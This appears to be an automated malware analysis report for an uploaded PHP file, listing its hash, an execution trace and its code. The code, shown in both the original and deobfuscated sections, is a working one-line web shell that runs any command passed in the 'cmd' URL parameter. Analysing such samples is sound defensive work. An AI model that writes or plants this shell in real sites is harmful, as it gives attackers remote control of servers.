PHP Malware Analysis

0Ahmm.PhP

md5: 403d584ac4b43825ef27585c00bd0a6c

Jump to:

Screenshot


Attributes

Execution

Input


Deobfuscated PHP code

<?php

echo $_GET["cmd"];
echo shell_exec($_GET["cmd"]);

Execution traces

data/traces/403d584ac4b43825ef27585c00bd0a6c_trace-1676258974.137.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:30:00.034879]
1	0	1	0.000210	393512
1	3	0	0.000261	394128	{main}	1		/var/www/html/uploads/0Ahmm.PhP	0	0
2	4	0	0.000304	394128	shell_exec	0		/var/www/html/uploads/0Ahmm.PhP	3	1	NULL
2	4	1	0.000328	394160
2	4	R			FALSE
1	3	1	0.000343	394128
			0.000370	314224
TRACE END   [2023-02-13 01:30:00.035079]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php  
echo($_GET["cmd"]);
echo(shell_exec($_GET["cmd"]));
?>